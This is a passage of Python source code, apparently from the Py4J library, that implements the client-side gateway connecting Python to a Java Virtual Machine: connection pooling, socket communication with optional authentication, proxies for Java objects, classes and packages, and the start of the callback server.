try:
connection = self.deque.pop()
except IndexError:
connection = self._create_connection()
return connection
def _create_connection(self):
connection = GatewayConnection(
self.gateway_parameters, self.gateway_property)
connection.start()
return connection
def _give_back_connection(self, connection):
try:
self.deque.append(connection)
except Exception:
logger.warning(
"Exception while giving back connection", exc_info=True)
def shutdown_gateway(self):
"""Sends a shutdown command to the gateway. This will close the
gateway server: all active connections will be closed. This may
be useful if the lifecycle of the Java program must be tied to
the Python program.
"""
connection = self._get_connection()
try:
connection.shutdown_gateway()
self.close()
self.is_connected = False
except Py4JNetworkError:
logger.debug("Error while shutting down gateway.", exc_info=True)
self.shutdown_gateway()
def send_command(self, command, retry=True, binary=False):
"""Sends a command to the JVM. This method is not intended to be
called directly by Py4J users. It is usually called by
:class:`JavaMember` instances.
:param command: the `string` command to send to the JVM. The command
must follow the Py4J protocol.
:param retry: if `True`, the GatewayClient tries to resend a message
if it fails.
:param binary: if `True`, we won't wait for a Py4J-protocol response
from the other end; we'll just return the raw connection to the
caller. The caller becomes the owner of the connection, and is
responsible for closing the connection (or returning it this
`GatewayClient` pool using `_give_back_connection`).
:rtype: the `string` answer received from the JVM (The answer follows
the Py4J protocol). The guarded `GatewayConnection` is also returned
if `binary` is `True`.
"""
connection = self._get_connection()
try:
response = connection.send_command(command)
if binary:
return response, self._create_connection_guard(connection)
elif is_fatal_error(response):
connection.close(False)
else:
self._give_back_connection(connection)
except Py4JNetworkError as pne:
if connection:
reset = False
if isinstance(pne.cause, socket.timeout):
reset = True
connection.close(reset)
if self._should_retry(retry, connection, pne):
logging.info("Exception while sending command.", exc_info=True)
response = self.send_command(command, binary=binary)
else:
logging.exception(
"Exception while sending command.")
response = proto.ERROR
return response
def _create_connection_guard(self, connection):
return GatewayConnectionGuard(self, connection)
def _should_retry(self, retry, connection, pne=None):
return pne and pne.when == proto.ERROR_ON_SEND
def close(self):
"""Closes all currently opened connections.
This operation is not thread safe and is only a best effort strategy
to close active connections.
All connections are guaranteed to be closed only if no other thread
is accessing the client and no call is pending.
"""
size = len(self.deque)
for _ in range(0, size):
try:
connection = self.deque.pop()
quiet_close(connection)
except IndexError:
pass
class GatewayConnection(object):
"""Default gateway connection (socket based) responsible for communicating
with the Java Virtual Machine."""
def __init__(self, gateway_parameters, gateway_property=None):
"""
:param gateway_parameters: the set of parameters used to configure the
GatewayClient.
:param gateway_property: contains gateway preferences to avoid a cycle
with gateway
"""
self.gateway_parameters = gateway_parameters
self.address = gateway_parameters.address
self.port = gateway_parameters.port
af_type = socket.getaddrinfo(self.address, self.port)[0][0]
self.socket = socket.socket(af_type, socket.SOCK_STREAM)
if gateway_parameters.read_timeout:
self.socket.settimeout(gateway_parameters.read_timeout)
if gateway_parameters.ssl_context:
self.socket = gateway_parameters.ssl_context.wrap_socket(
self.socket, server_hostname=self.address)
self.is_connected = False
self.auto_close = gateway_parameters.auto_close
self.gateway_property = gateway_property
self.wr = weakref.ref(
self,
lambda wr, socket_instance=self.socket:
_garbage_collect_connection and
_garbage_collect_connection(socket_instance))
def start(self):
"""Starts the connection by connecting to the `address` and the `port`
"""
try:
self.socket.connect((self.address, self.port))
self.stream = self.socket.makefile("rb")
self.is_connected = True
self._authenticate_connection()
except Py4JAuthenticationError:
logger.exception("Cannot authenticate with gateway server.")
raise
except Exception as e:
msg = "An error occurred while trying to connect to the Java "\
"server ({0}:{1})".format(self.address, self.port)
logger.exception(msg)
raise Py4JNetworkError(msg, e)
def _authenticate_connection(self):
if self.gateway_parameters.auth_token:
cmd = "{0}\n{1}\n".format(
proto.AUTH_COMMAND_NAME,
self.gateway_parameters.auth_token
)
answer = self.send_command(cmd)
error, _ = proto.is_error(answer)
if error:
# At this point we do not expect the caller to clean
# the connection so we clean ourselves.
self.close(reset=True)
raise Py4JAuthenticationError(
"Failed to authenticate with gateway server.")
def close(self, reset=False):
"""Closes the connection by closing the socket.
If reset is True, sends a RST packet with SO_LINGER
"""
if reset:
set_linger(self.socket)
else:
# Sent shut down before attempting to close a stream or socket.
quiet_shutdown(self.socket)
quiet_close(self.stream)
quiet_close(self.socket)
self.is_connected = False
def shutdown_gateway(self):
"""Sends a shutdown command to the gateway. This will close the gateway
server: all active connections will be closed. This may be useful
if the lifecycle of the Java program must be tied to the Python
program.
"""
if not self.is_connected:
raise Py4JError("Gateway must be connected to send shutdown cmd.")
try:
quiet_close(self.stream)
self.socket.sendall(
proto.SHUTDOWN_GATEWAY_COMMAND_NAME.encode("utf-8"))
quiet_close(self.socket)
self.is_connected = False
except Exception:
# Do nothing! Exceptions might occur anyway.
logger.debug("Exception occurred while shutting down gateway",
exc_info=True)
def send_command(self, command):
"""Sends a command to the JVM. This method is not intended to be
called directly by Py4J users: it is usually called by JavaMember
instances.
:param command: the `string` command to send to the JVM. The command
must follow the Py4J protocol.
:rtype: the `string` answer received from the JVM (The answer follows
the Py4J protocol).
"""
logger.debug("Command to send: {0}".format(command))
try:
# Write will only fail if remote is closed for large payloads or
# if it sent a RST packet (SO_LINGER)
self.socket.sendall(command.encode("utf-8"))
except Exception as e:
logger.info("Error while sending.", exc_info=True)
raise Py4JNetworkError(
"Error while sending", e, proto.ERROR_ON_SEND)
try:
answer = smart_decode(self.stream.readline()[:-1])
logger.debug("Answer received: {0}".format(answer))
if answer.startswith(proto.RETURN_MESSAGE):
answer = answer[1:]
# Happens when a the other end is dead. There might be an empty
# answer before the socket raises an error.
if answer.strip() == "":
raise Py4JNetworkError("Answer from Java side is empty")
return answer
except Exception as e:
logger.info("Error while receiving.", exc_info=True)
raise Py4JNetworkError(
"Error while receiving", e, proto.ERROR_ON_RECEIVE)
class JavaMember(object):
"""Represents a member (i.e., method) of a :class:`JavaObject`. For now,
only methods are supported. Fields are retrieved directly and are not
contained in a JavaMember.
"""
def __init__(self, name, container, target_id, gateway_client):
self.name = name
self.container = container
self.target_id = target_id
self.gateway_client = gateway_client
self.command_header = self.target_id + "\n" + self.name + "\n"
self.pool = self.gateway_client.gateway_property.pool
self.converters = self.gateway_client.converters
self._gateway_doc = None
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self.gateway_client, self, display=False)
return self._gateway_doc
def _get_args(self, args):
temp_args = []
new_args = []
for arg in args:
if not isinstance(arg, JavaObject):
for converter in self.gateway_client.converters:
if converter.can_convert(arg):
temp_arg = converter.convert(arg, self.gateway_client)
temp_args.append(temp_arg)
new_args.append(temp_arg)
break
else:
new_args.append(arg)
else:
new_args.append(arg)
return (new_args, temp_args)
def _build_args(self, *args):
if self.converters is not None and len(self.converters) > 0:
(new_args, temp_args) = self._get_args(args)
else:
new_args = args
temp_args = []
args_command = "".join(
[get_command_part(arg, self.pool) for arg in new_args])
return args_command, temp_args
def stream(self, *args):
"""
Call the method using the 'binary' protocol.
:rtype: The `GatewayConnection` that the call command was sent to.
"""
args_command, temp_args = self._build_args(*args)
command = proto.STREAM_COMMAND_NAME +\
self.command_header +\
args_command +\
proto.END_COMMAND_PART
answer, connection = self.gateway_client.send_command(
command, binary=True)
# parse the return value to throw an exception if necessary
get_return_value(
answer, self.gateway_client, self.target_id, self.name)
for temp_arg in temp_args:
temp_arg._detach()
return connection
def __call__(self, *args):
args_command, temp_args = self._build_args(*args)
command = proto.CALL_COMMAND_NAME +\
self.command_header +\
args_command +\
proto.END_COMMAND_PART
answer = self.gateway_client.send_command(command)
return_value = get_return_value(
answer, self.gateway_client, self.target_id, self.name)
for temp_arg in temp_args:
temp_arg._detach()
return return_value
class JavaObject(object):
"""Represents a Java object from which you can call methods or access
fields."""
def __init__(self, target_id, gateway_client):
"""
:param target_id: the identifier of the object on the JVM side. Given
by the JVM.
:param gateway_client: the gateway client used to communicate with
the JVM.
"""
self._target_id = target_id
self._gateway_client = gateway_client
self._auto_field = gateway_client.gateway_property.auto_field
self._methods = {}
self._field_names = set()
self._fully_populated = False
self._gateway_doc = None
key = smart_decode(self._gateway_client.address) +\
smart_decode(self._gateway_client.port) +\
self._target_id
if self._gateway_client.gateway_property.enable_memory_management:
value = weakref.ref(
self,
lambda wr, cc=self._gateway_client, id=self._target_id:
_garbage_collect_object and _garbage_collect_object(cc, id))
ThreadSafeFinalizer.add_finalizer(key, value)
def _detach(self):
_garbage_collect_object(self._gateway_client, self._target_id)
def _get_object_id(self):
return self._target_id
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self._gateway_client, self, display=False)
return self._gateway_doc
def __getattr__(self, name):
if name == "__call__":
# Provide an explicit definition for __call__ so that a JavaMember
# does not get created for it. This serves two purposes:
# 1) IPython (and others?) stop showing incorrect help indicating
# that this is callable
# 2) A TypeError(object not callable) is raised if someone does try
# to call here
raise AttributeError
if name not in self._methods:
if (self._auto_field):
(is_field, return_value) = self._get_field(name)
if (is_field):
self._field_names.add(name)
return return_value
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
self._methods[name] = JavaMember(
name, self, self._target_id, self._gateway_client)
# The name is a method
return self._methods[name]
def __dir__(self):
self._populate_fields()
return list(set(self._methods.keys()) | self._field_names)
def _populate_fields(self):
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
if not self._fully_populated:
if self._auto_field:
command = proto.DIR_COMMAND_NAME +\
proto.DIR_FIELDS_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._target_id, "__dir__")
self._field_names.update(return_value.split("\n"))
command = proto.DIR_COMMAND_NAME +\
proto.DIR_METHODS_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._target_id, "__dir__")
names = return_value.split("\n")
for name in names:
if name not in self._methods:
self._methods[name] = JavaMember(
name, self, self._target_id, self._gateway_client)
self._fully_populated = True
def _get_field(self, name):
command = proto.FIELD_COMMAND_NAME +\
proto.FIELD_GET_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
name + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if answer == proto.NO_MEMBER_COMMAND or is_error(answer)[0]:
return (False, None)
else:
return_value = get_return_value(
answer, self._gateway_client, self._target_id, name)
return (True, return_value)
def __eq__(self, other):
if other is None:
return False
elif (hasattr2(other, "_get_object_id")):
return self.equals(other)
else:
return other.__eq__(self)
def __hash__(self):
return self.hashCode()
def __str__(self):
return self.toString()
def __repr__(self):
# For now...
return "JavaObject id=" + self._target_id
class JavaClass(object):
"""A `JavaClass` represents a Java Class from which static members can be
retrieved. `JavaClass` instances are also needed to initialize an array.
Usually, `JavaClass` are not initialized using their constructor, but
they are created while accessing the `jvm` property of a gateway, e.g.,
`gateway.jvm.java.lang.String`.
"""
def __init__(self, fqn, gateway_client):
self._fqn = fqn
self._gateway_client = gateway_client
self._pool = self._gateway_client.gateway_property.pool
self._command_header = fqn + "\n"
self._converters = self._gateway_client.converters
self._gateway_doc = None
self._statics = None
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self._gateway_client, self, display=False)
return self._gateway_doc
def __dir__(self):
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
if self._statics is None:
command = proto.DIR_COMMAND_NAME +\
proto.DIR_STATIC_SUBCOMMAND_NAME +\
self._fqn + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._fqn, "__dir__")
self._statics = return_value.split("\n")
return self._statics[:]
@property
def _java_lang_class(self):
"""Gets the java.lang.Class of the current JavaClass. This is
equivalent to calling .class in Java.
"""
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_JAVA_LANG_CLASS_SUB_COMMAND_NAME +\
self._fqn + "\n" + proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if len(answer) > 1 and answer[0] == proto.SUCCESS:
return get_return_value(
answer, self._gateway_client, self._fqn, "_java_lang_class")
else:
raise Py4JError(
"{0} does not exist in the JVM".format(self._fqn))
def __getattr__(self, name):
if name in ["__str__", "__repr__"]:
raise AttributeError
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_MEMBER_SUB_COMMAND_NAME +\
self._fqn + "\n" +\
name + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if len(answer) > 1 and answer[0] == proto.SUCCESS:
if answer[1] == proto.METHOD_TYPE:
return JavaMember(
name, None, proto.STATIC_PREFIX + self._fqn,
self._gateway_client)
elif answer[1].startswith(proto.CLASS_TYPE):
return JavaClass(
self._fqn + "$" + name, self._gateway_client)
else:
return get_return_value(
answer, self._gateway_client, self._fqn, name)
else:
raise Py4JError(
"{0}.{1} does not exist in the JVM".format(self._fqn, name))
def _get_args(self, args):
temp_args = []
new_args = []
for arg in args:
if not isinstance(arg, JavaObject):
for converter in self._converters:
if converter.can_convert(arg):
temp_arg = converter.convert(arg, self._gateway_client)
temp_args.append(temp_arg)
new_args.append(temp_arg)
break
else:
new_args.append(arg)
else:
new_args.append(arg)
return (new_args, temp_args)
def __call__(self, *args):
# TODO Refactor to use a mixin shared by JavaMember and JavaClass
if self._converters is not None and len(self._converters) > 0:
(new_args, temp_args) = self._get_args(args)
else:
new_args = args
temp_args = []
args_command = "".join(
[get_command_part(arg, self._pool) for arg in new_args])
command = proto.CONSTRUCTOR_COMMAND_NAME +\
self._command_header +\
args_command +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, None, self._fqn)
for temp_arg in temp_args:
temp_arg._detach()
return return_value
class UserHelpAutoCompletion(object):
"""
Type a package name or a class name.
For example with a JVMView called view:
>>> o = view.Object() # create a java.lang.Object
>>> random = view.jvm.java.util.Random() # create a java.util.Random
The default JVMView is in the gateway and is called:
>>> gateway.jvm
By default, java.lang.* is available in the view. To
add additional Classes/Packages, do:
>>> from py4j.java_gateway import java_import
>>> java_import(gateway.jvm, "com.example.Class1")
>>> instance = gateway.jvm.Class1()
Package and class completions are only available for
explicitly imported Java classes. For example, if you
java_import(gateway.jvm, "com.example.Class1")
then Class1 will appear in the completions.
"""
KEY = "<package or class name>"
class JavaPackage(object):
"""A `JavaPackage` represents part of a Java package from which Java
classes can be accessed.
Usually, `JavaPackage` are not initialized using their constructor, but
they are created while accessing the `jvm` property of a gateway, e.g.,
`gateway.jvm.java.lang`.
"""
def __init__(self, fqn, gateway_client, jvm_id=None):
self._fqn = fqn
self._gateway_client = gateway_client
if jvm_id is None:
self._jvm_id = proto.DEFAULT_JVM_ID
self._jvm_id = jvm_id
def __dir__(self):
return [UserHelpAutoCompletion.KEY]
def __getattr__(self, name):
if name == UserHelpAutoCompletion.KEY:
return UserHelpAutoCompletion
if name in ["__str__", "__repr__"]:
raise AttributeError
if name == "__call__":
raise Py4JError("Trying to call a package.")
new_fqn = self._fqn + "." + name
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_UNKNOWN_SUB_COMMAND_NAME +\
new_fqn + "\n" +\
self._jvm_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if answer == proto.SUCCESS_PACKAGE:
return JavaPackage(new_fqn, self._gateway_client, self._jvm_id)
elif answer.startswith(proto.SUCCESS_CLASS):
return JavaClass(
answer[proto.CLASS_FQN_START:], self._gateway_client)
else:
raise Py4JError("{0} does not exist in the JVM".format(new_fqn))
class JVMView(object):
"""A `JVMView` allows access to the Java Virtual Machine of a
`JavaGateway`.
This can be used to reference static members (fields and methods) and
to call constructors.
"""
def __init__(self, gateway_client, jvm_name, id=None, jvm_object=None):
self._gateway_client = gateway_client
self._jvm_name = jvm_name
if id is not None:
self._id = id
elif jvm_object is not None:
self._id = proto.REFERENCE_TYPE + jvm_object._get_object_id()
# So that both JVMView instances (on Python and Java) have the
# same lifecycle. Theoretically, JVMView could inherit from
# JavaObject, but I would like to avoid the use of reflection
# for regular Py4J classes.
self._jvm_object = jvm_object
self._dir_sequence_and_cache = (None, [])
def __dir__(self):
command = proto.DIR_COMMAND_NAME +\
proto.DIR_JVMVIEW_SUBCOMMAND_NAME +\
self._id + "\n" +\
get_command_part(self._dir_sequence_and_cache[0]) +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._fqn, "__dir__")
if return_value is not None:
result = return_value.split("\n")
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
self._dir_sequence_and_cache = (
result[0], result[1:] + [UserHelpAutoCompletion.KEY])
return self._dir_sequence_and_cache[1][:]
def __getattr__(self, name):
if name == UserHelpAutoCompletion.KEY:
return UserHelpAutoCompletion()
answer = self._gateway_client.send_command(
proto.REFLECTION_COMMAND_NAME +
proto.REFL_GET_UNKNOWN_SUB_COMMAND_NAME + name + "\n" + self._id +
"\n" + proto.END_COMMAND_PART)
if answer == proto.SUCCESS_PACKAGE:
return JavaPackage(name, self._gateway_client, jvm_id=self._id)
elif answer.startswith(proto.SUCCESS_CLASS):
return JavaClass(
answer[proto.CLASS_FQN_START:], self._gateway_client)
else:
_, error_message = get_error_message(answer)
message = compute_exception_message(
"{0} does not exist in the JVM".format(name), error_message)
raise Py4JError(message)
class GatewayProperty(object):
"""Object shared by callbackserver, gateway, and connections.
"""
def __init__(self, auto_field, pool, enable_memory_management=True):
self.auto_field = auto_field
self.pool = pool
self.enable_memory_management = enable_memory_management
class JavaGateway(object):
"""A `JavaGateway` is the main interaction point between a Python VM and
a JVM.
* A `JavaGateway` instance is connected to a `Gateway` instance on the
Java side.
* The `entry_point` field of a `JavaGateway` instance is connected to
the `Gateway.entryPoint` instance on the Java side.
* The `java_gateway_server` field of a `JavaGateway` instance is connected
to the `GatewayServer` instance on the Java side.
* The `jvm` field of `JavaGateway` enables user to access classes, static
members (fields and methods) and call constructors.
Methods that are not defined by `JavaGateway` are always redirected to
`entry_point`. For example, ``gateway.doThat()`` is equivalent to
``gateway.entry_point.doThat()``. This is a trade-off between convenience
and potential confusion.
"""
def __init__(
self, gateway_client=None, auto_field=False,
python_proxy_port=DEFAULT_PYTHON_PROXY_PORT,
start_callback_server=False, auto_convert=False, eager_load=False,
gateway_parameters=None, callback_server_parameters=None,
python_server_entry_point=None):
"""
:param gateway_parameters: An instance of `GatewayParameters` used to
configure the various options of the gateway.
:param callback_server_parameters: An instance of
`CallbackServerParameters` used to configure various options of the
gateway server. Must be provided to start a gateway server.
Otherwise, callbacks won"t be available.
:param python_server_entry_point: can be requested by the Java side if
Java is driving the communication.
"""
self.gateway_parameters = gateway_parameters
if not gateway_parameters:
self.gateway_parameters = GatewayParameters(
auto_field=auto_field, auto_convert=auto_convert,
eager_load=eager_load)
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
# No parameters were provided so do not autostart callback server.
# TODO BASE 64
raw_token = unescape_new_line(self.gateway_parameters.auth_token)
self.callback_server_parameters = CallbackServerParameters(
port=python_proxy_port, eager_load=False,
auth_token=raw_token)
# Check for deprecation warnings
if auto_field:
deprecated("JavaGateway.auto_field", "1.0", "GatewayParameters")
if auto_convert:
deprecated("JavaGateway.auto_convert", "1.0", "GatewayParameters")
if eager_load:
deprecated("JavaGateway.eager_load", "1.0", "GatewayParameters")
if start_callback_server:
deprecated(
"JavaGateway.start_callback_server and python_proxy_port",
"1.0", "CallbackServerParameters")
self.callback_server_parameters.eager_load = True
if gateway_client:
deprecated("JavaGateway.gateway_client", "1.0",
"GatewayParameters")
else:
gateway_client = self._create_gateway_client()
self.python_server_entry_point = python_server_entry_point
self._python_proxy_port = python_proxy_port
self.gateway_property = self._create_gateway_property()
# Setup gateway client
self.set_gateway_client(gateway_client)
# Setup callback server property
self._callback_server = None
if self.gateway_parameters.eager_load:
self._eager_load()
if self.callback_server_parameters.eager_load:
self.start_callback_server(self.callback_server_parameters)
def _create_gateway_client(self):
gateway_client = GatewayClient(
gateway_parameters=self.gateway_parameters)
return gateway_client
def _create_gateway_property(self):
gateway_property = GatewayProperty(
self.gateway_parameters.auto_field, PythonProxyPool(),
self.gateway_parameters.enable_memory_management)
if self.python_server_entry_point:
gateway_property.pool.put(
self.python_server_entry_point, proto.ENTRY_POINT_OBJECT_ID)
return gateway_property
def set_gateway_client(self, gateway_client):
"""Sets the gateway client for this JavaGateway. This sets the
appropriate gateway_property and resets the main jvm view (self.jvm).
This is for advanced usage only. And should only be set before the
gateway is loaded.
"""
if self.gateway_parameters.auto_convert:
gateway_client.converters = proto.INPUT_CONVERTER
else:
gateway_client.converters = None
gateway_client.gateway_property = self.gateway_property
self._gateway_client = gateway_client
self.entry_point = JavaObject(
proto.ENTRY_POINT_OBJECT_ID, self._gateway_client)
self.java_gateway_server = JavaObject(
proto.GATEWAY_SERVER_OBJECT_ID, self._gateway_client)
self.jvm = JVMView(
self._gateway_client, jvm_name=proto.DEFAULT_JVM_NAME,
id=proto.DEFAULT_JVM_ID)
def __getattr__(self, name):
return self.entry_point.__getattr__(name)
def _eager_load(self):
try:
self.jvm.System.currentTimeMillis()
except Exception:
self.shutdown()
raise
def get_callback_server(self):
return self._callback_server
def start_callback_server(self, callback_server_parameters=None):
"""Starts the callback server.
:param callback_server_parameters: parameters to use to start the
server. If not provided, it will use the gateway callback server
parameters.
:rtype: Returns True if the server was started by this call or False if
it was already started (you cannot have more than one started
callback server).
"""
if self._callback_server:
return False
if not callback_server_parameters:
callback_server_parameters = self.callback_server_parameters
self._callback_server = self._create_callback_server(
callback_server_parameters)
try:
self._callback_server.start()
except Py4JNetworkError:
# Clean up ourselves before raising the exception.
self.shutdown()
self._callback_server = None
raise
return True
def _create_callback_server(self, callback_server_parameters):
callback_server = CallbackServer(
self.gateway_property.pool, self._gateway_client,
callback_server_parameters=callback_server_parameters)
return callback_server
def new_jvm_view(self, name="custom jvm"):
"""Creates a new JVM view with its own imports. A JVM view ensures
that the import made in one view does not conflict with the import
of another view.
Generally, each Python module should have its own view (to replicate
Java behavior).
:param name: Optional name of the jvm view. Does not need to be
unique, i.e., two distinct views can have the same name
(internally, they will have a distinct id).
:rtype: A JVMView instance (same class as the gateway.jvm instance).
"""
command = proto.JVMVIEW_COMMAND_NAME +\
proto.JVM_CREATE_VIEW_SUB_COMMAND_NAME +\
get_command_part(name) +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
java_object = get_return_value(answer, self._gateway_client)
return JVMView(
gateway_client=self._gateway_client, jvm_name=name,
jvm_object=java_object)
def new_array(self, java_class, *dimensions):
"""Creates a Java array of type `java_class` of `dimensions`
:param java_class: The :class:`JavaClass` instance representing the
type of the array.
:param dimensions: A list of dimensions of the array. For example
`[1,2]` would produce an `array[1][2]`.
:rtype: A :class:`JavaArray <py4j.java_collections.JavaArray>`
instance.
"""
if len(dimensions) == 0:
raise Py4JError("new arrays must have at least one dimension")
command = proto.ARRAY_COMMAND_NAME +\
proto.ARRAY_CREATE_SUB_COMMAND_NAME +\
get_command_part(java_class._fqn)
for dimension in dimensions:
command += get_command_part(dimension)
command += proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return get_return_value(answer, self._gateway_client)
def shutdown(self, raise_exception=False):
"""Shuts down the :class:`GatewayClient` and the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`.
:param raise_exception: If `True`, raise an exception if an error
occurs while shutting down (very likely with sockets).
"""
try:
self._gateway_client.shutdown_gateway()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while shutting down callback server",
exc_info=True)
self.shutdown_callback_server()
def shutdown_callback_server(self, raise_exception=False):
"""Shuts down the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`.
:param raise_exception: If `True`, raise an exception if an error
occurs while shutting down (very likely with sockets).
"""
if self._callback_server is None:
# Nothing to shutdown
return
try:
self._callback_server.shutdown()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while shutting down callback server",
exc_info=True)
def close_callback_server(self, raise_exception=False):
"""Closes the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`
connections.
:param raise_exception: If `True`, raise an exception if an error
occurs while closing the callback server connections
(very likely with sockets).
"""
if self._callback_server is None:
# Nothing to shutdown
return
try:
self._callback_server.close()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while closing callback server",
exc_info=True)
def restart_callback_server(self):
"""Shuts down the callback server (if started) and restarts a new one.
"""
self.shutdown_callback_server()
self._callback_server = None
self.start_callback_server(self.callback_server_parameters)
def close(
self, keep_callback_server=False,
close_callback_server_connections=False):
"""Closes all gateway connections. A connection will be reopened if
necessary (e.g., if a :class:`JavaMethod` is called).
:param keep_callback_server: if `True`, the callback server is not
shut down. Mutually exclusive with
close_callback_server_connections.
:param close_callback_server_connections: if `True`, close all
callback server connections.
"""
self._gateway_client.close()
if not keep_callback_server:
deprecated(
"JavaGateway.close.keep_callback_server", "1.0",
"JavaGateway.shutdown_callback_server")
self.shutdown_callback_server()
elif close_callback_server_connections:
self.close_callback_server()
def detach(self, java_object):
"""Makes the Java Gateway dereference this object.
The equivalent of this method is called when a JavaObject instance
is garbage collected on the Python side. This method, or gc.collect()
should still be invoked when memory is limited or when too many objects
are created on the Java side.
:param java_object: The JavaObject instance to dereference (free) on
the Java side.
"""
java_object._detach()
def help(self, var, pattern=None, short_name=True, display=True):
"""Displays a help page about a class or an object.
:param var: JavaObject, JavaClass or JavaMember for which a help page
will be generated.
:param pattern: Star-pattern used to filter the members. For example
"get\*Foo" may return getMyFoo, getFoo, getFooBar, but not
bargetFoo. The pattern is matched against the entire signature.
To match only the name of a method, use "methodName(\*".
:param short_name: If True, only the simple name of the parameter
types and return types will be displayed. If False, the fully
qualified name of the types will be displayed.
:param display: If True, the help page is displayed in an interactive
page similar to the `help` command in Python. If False, the page is
returned as a string.
"""
return gateway_help(
self._gateway_client, var, pattern, short_name, display)
@classmethod
def launch_gateway(
cls, port=0, jarpath="", classpath="", javaopts=[],
die_on_exit=False, redirect_stdout=None,
redirect_stderr=None, daemonize_redirect=True, java_path="java",
create_new_process_group=False, enable_auth=False):
"""Launch a `Gateway` in a new Java process and create a default
:class:`JavaGateway <py4j.java_gateway.JavaGateway>` to connect to
it.
See :func:`launch_gateway <py4j.java_gateway.launch_gateway>` for more
information about this function.
:param port: the port to launch the Java Gateway on. If no port is
specified then an ephemeral port is used.
:param jarpath: the path to the Py4J jar. Only necessary if the jar
was installed at a non-standard location or if Python is using
a different `sys.prefix` than the one that Py4J was installed
under.
:param classpath: the classpath used to launch the Java Gateway.
:param javaopts: an array of extra options to pass to Java (the
classpath should be specified using the `classpath` parameter,
not `javaopts`.)
:param die_on_exit: if `True`, the Java gateway process will die when
this Python process exits or is killed.
:param redirect_stdout: where to redirect the JVM stdout.
If None (default)
stdout is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
:param redirect_stderr: where to redirect the JVM stdout.
If None (default)
stderr is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
:param daemonize_redirect: if True, the consumer threads will be
daemonized and will not prevent the main Python process from
exiting. This means the file descriptors (stderr, stdout,
redirect_stderr, redirect_stdout) might not be properly closed.
This is not usually a problem, but in case of errors related
to file descriptors, set this flag to False.
:param java_path: If None, Py4J will use $JAVA_HOME/bin/java if
$JAVA_HOME is defined, otherwise it will use "java".
:param create_new_process_group: If True, the JVM is started in a new
process group. This ensures that signals sent to the parent Python
process are not forwarded to the JVM. For example, sending
Ctrl-C/SIGINT won't interrupt the JVM. If the python process dies,
the Java process will stay alive, which may be a problem for some
scenarios though.
:param enable_auth: If True, the server will require clients to provide
an authentication token when connecting.
:rtype: a :class:`JavaGateway <py4j.java_gateway.JavaGateway>`
connected to the `Gateway` server.
"""
_ret = launch_gateway(
port, jarpath, classpath, javaopts, die_on_exit,
redirect_stdout=redirect_stdout, redirect_stderr=redirect_stderr,
daemonize_redirect=daemonize_redirect, java_path=java_path,
create_new_process_group=create_new_process_group,
enable_auth=enable_auth)
if enable_auth:
_port, _auth_token = _ret
else:
_port, _auth_token = _ret, None
gateway = JavaGateway(
gateway_parameters=GatewayParameters(port=_port,
auth_token=_auth_token))
return gateway
# CALLBACK SPECIFIC
class CallbackServer(object):
"""The CallbackServer is responsible for receiving call back connection
requests from the JVM. Usually connections are reused on the Java side,
but there is at least one connection per concurrent thread.
"""
def __init__(
self, pool, gateway_client, port=DEFAULT_PYTHON_PROXY_PORT,
address=DEFAULT_ADDRESS, callback_server_parameters=None):
"""
:param pool: the pool responsible of tracking Python objects passed to
the Java side.
:param gateway_client: the gateway client used to call Java objects.
:param callback_server_parameters: An instance of
`CallbackServerParameters` used to configure various options of the
callback server.
"""
self.gateway_client = gateway_client
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
deprecated(
"CallbackServer.port and address", "1.0",
"CallbackServerParameters")
self.callback_server_parameters = CallbackServerParameters(
address=address, port=port)
self.port = self.callback_server_parameters.port
self.address = self.callback_server_parameters.address
self.ssl_context = self.callback_server_parameters.ssl_context
self.pool = pool
self.connections = weakref.WeakSet()
# Lock is used to isolate critical region like connection creation.
# Some code can produce exceptions when ran in parallel, but
# They will be caught and dealt with.
self.lock = RLock()
self.is_shutdown = False
self.is_shutting_down = False
def start(self):
"""Starts the CallbackServer. This method should be called by the
client instead of run()."""
af_type = socket.getaddrinfo(self.address, self.port)[0][0]
self.server_socket = socket.socket(af_type, socket.SOCK_STREAM)
